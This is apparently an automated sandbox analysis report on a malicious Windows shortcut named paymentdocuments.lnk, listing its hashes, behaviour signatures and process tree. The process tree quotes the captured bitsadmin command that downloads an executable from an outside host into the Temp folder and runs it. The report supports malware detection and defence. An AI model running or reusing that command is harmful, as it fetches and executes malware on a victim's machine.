Analysis
-
max time kernel
124s -
max time network
133s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
-
submitted
02-02-2023 13:40
General
-
Target
paymentdocuments.lnk
-
Size
2KB
-
MD5
043991eeea237ac12513ae5741193655
-
SHA1
a9c0fe39859b3c47f9adb410431ee591e1aeffcf
-
SHA256
db52b6d029185eca3936b2086a0f6afb7ea8303eecc392c637c5595e510afb36
-
SHA512
94c1c957d04c5ca2f1c7bea65aa8bfe91ac38c5b93141a1f53b8144fc17646647641558cb6d7a0a4c2ab01a201812226ce34ee25006f76c052f05934da2fb5fd
Score
7/10
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Download via BitsAdmin 1 TTPs 1 IoCs
-
Suspicious use of WriteProcessMemory 4 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\paymentdocuments.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c "bitsadmin /transfer bitstranshg /priority foreground http://afirmfwc.org/10873.exe C:\Users\Admin\AppData\Local\Temp\HbdHnshBc.exe > NUL & start C:\Users\Admin\AppData\Local\Temp\HbdHnshBc.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\bitsadmin.exebitsadmin /transfer bitstranshg /priority foreground http://afirmfwc.org/10873.exe C:\Users\Admin\AppData\Local\Temp\HbdHnshBc.exe3⤵
- Download via BitsAdmin
-
-